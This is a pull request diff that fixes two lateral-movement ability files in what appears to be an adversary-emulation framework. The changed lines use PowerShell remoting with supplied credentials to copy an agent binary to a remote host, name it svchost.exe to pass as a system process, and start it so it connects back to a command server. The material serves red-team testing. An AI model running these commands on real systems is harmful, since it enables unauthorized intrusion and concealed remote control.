### PR TITLE
Add some fixes to a couple LM abilities

### DIFF
--- a/data/abilities/lateral-movement/41bb2b7a-75af-49fd-bd15-6c827df25921.yml
+++ b/data/abilities/lateral-movement/41bb2b7a-75af-49fd-bd15-6c827df25921.yml
@@ -15,7 +15,7 @@
           $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
           $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
           $session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
-          Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} -executors psh}};
+          Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
           Start-Sleep -s 5;
           Remove-PSSession -Session $session;
         cleanup: |

--- a/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
+++ b/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
@@ -18,7 +18,7 @@
             $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
             $location = "#{location}";
             $exe = "#{exe_name}";
-            Copy-Item $location.replace($exe, "sandcat.go-windows") -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
+            Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
             Start-Sleep -s 5;
             Remove-PSSession -Session $session;
           };


### PR DESCRIPTION
Changes: 

- correct two abilities to recognize that:
  - `#{location}` now points to the full agent image path 
  - gocat no longer takes a `-executors` argument